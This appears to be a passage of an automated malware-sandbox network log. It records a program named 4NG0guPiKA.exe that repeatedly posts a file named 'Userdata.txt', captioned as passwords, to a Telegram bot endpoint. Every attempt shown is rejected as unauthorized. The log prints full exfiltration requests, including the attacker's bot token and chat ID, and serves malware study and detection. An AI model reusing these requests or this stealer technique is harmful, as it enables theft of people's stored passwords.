                                                                                                          Date: Sat, 11 Jan 2025 02:06:12 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:12 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.1049730149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:15 UTC294OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3397358e49f3
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 02:06:15 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 39 37 33 35 38 65 34 39 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3397358e49f3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:15 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:15 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:15 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.1049732149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:17 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd33b140535537
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:06:17 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 62 31 34 30 35 33 35 35 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd33b140535537Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:17 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:17 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:17 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.1049734149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:19 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd33c89ef7f87d
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:06:19 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 63 38 39 65 66 37 66 38 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd33c89ef7f87dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:19 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:19 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:19 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.1049736149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:21 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd33e3cef7ff2f
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:06:21 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 65 33 63 65 66 37 66 66 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd33e3cef7ff2fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:21 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:21 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:21 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.1049738149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:22 UTC294OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd33fd9dff96db
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 02:06:22 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 66 64 39 64 66 66 39 36 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd33fd9dff96dbContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:23 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:23 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:23 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.1049740149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:24 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd341dc0addca8
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:06:24 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 31 64 63 30 61 64 64 63 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd341dc0addca8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:24 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:24 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:24 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          16192.168.2.1049742149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:26 UTC270OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd343c81d2ea8c
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-11 02:06:26 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 33 63 38 31 64 32 65 61 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd343c81d2ea8cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:26 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:26 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:26 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          17192.168.2.1049744149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:28 UTC294OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd345f0111b6e8
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 02:06:28 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 35 66 30 31 31 31 62 36 65 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd345f0111b6e8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:28 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:28 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:28 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          18192.168.2.1049746149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:29 UTC294OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd348169074dc8
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-11 02:06:29 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 38 31 36 39 30 37 34 64 63 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd348169074dc8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-11 02:06:29 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Sat, 11 Jan 2025 02:06:29 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-11 02:06:29 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          19192.168.2.1049748149.154.167.2204438156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-11 02:06:31 UTC294OUTPOST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd34a782720438
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
